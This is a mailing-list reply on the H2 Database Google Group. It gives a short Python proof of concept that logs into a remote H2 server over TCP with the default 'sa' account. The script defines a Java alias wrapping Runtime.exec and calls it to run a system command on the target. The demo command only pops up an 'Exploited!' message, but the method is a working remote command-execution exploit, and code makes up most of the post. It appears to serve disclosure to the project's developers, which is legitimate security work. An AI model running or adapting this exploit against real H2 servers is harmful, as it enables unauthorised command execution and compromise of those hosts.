Here's a small Python POC:
- Windows-based (feel free to tweak for *nix)
- Requires jaydebeapi (run "pip install jaydebeapi")
- Assumes javac is in the system path (so does the original POC)
import jaydebeapi
SERVER = "SERVER_TO_EXPLOIT"
conn = jaydebeapi.connect("org.h2.Driver",
"jdbc:h2:tcp://%s:9092/C:\\Windows\\Temp\\exploit" % (SERVER),["sa", ""],
"./h2-1.4.196.jar",)
curs = conn.cursor()
curs.execute('DROP ALIAS IF EXISTS EXECVE')
curs.execute('CREATE ALIAS EXECVE AS $$ void execve(String cmd) throws
java.io.IOException { Runtime.getRuntime().exec(cmd); }$$;')
curs.execute("CALL EXECVE('c:\\windows\\system32\\msg.exe *
\"Exploited!\"')")
On Thursday, November 1, 2018 at 1:02:31 PM UTC-4, Noel Grandin wrote:
>
> where is the JDBC version of the exploit?
>
--
You received this message because you are subscribed to the Google Groups "H2
Database" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
To post to this group, send email to [email protected].
Visit this group at https://groups.google.com/group/h2-database.
For more options, visit https://groups.google.com/d/optout.
